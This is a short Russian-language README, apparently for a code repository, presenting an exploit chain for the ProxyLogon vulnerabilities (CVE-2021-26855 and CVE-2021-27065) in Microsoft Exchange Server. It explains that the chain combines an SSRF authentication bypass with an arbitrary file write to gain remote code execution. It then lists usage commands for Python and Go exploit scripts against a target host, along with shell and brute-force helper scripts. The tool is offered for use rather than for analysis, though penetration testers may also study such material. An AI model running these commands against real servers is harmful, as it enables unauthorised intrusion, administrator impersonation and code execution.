
Эксплойт-цепочка для CVE-2021-26855 и CVE-2021-27065, нацеленная на Microsoft Exchange Server, обеспечивающая обход аутентификации и удалённое выполнение кода через SSRF и произвольную запись файлов.
ProxyLogon — это формальное общее название для CVE-2021-26855, уязвимости на Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также объединили эту ошибку с другой уязвимостью после аутентификации — произвольной записью файлов (CVE-2021-27065), чтобы получить выполнение кода.
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py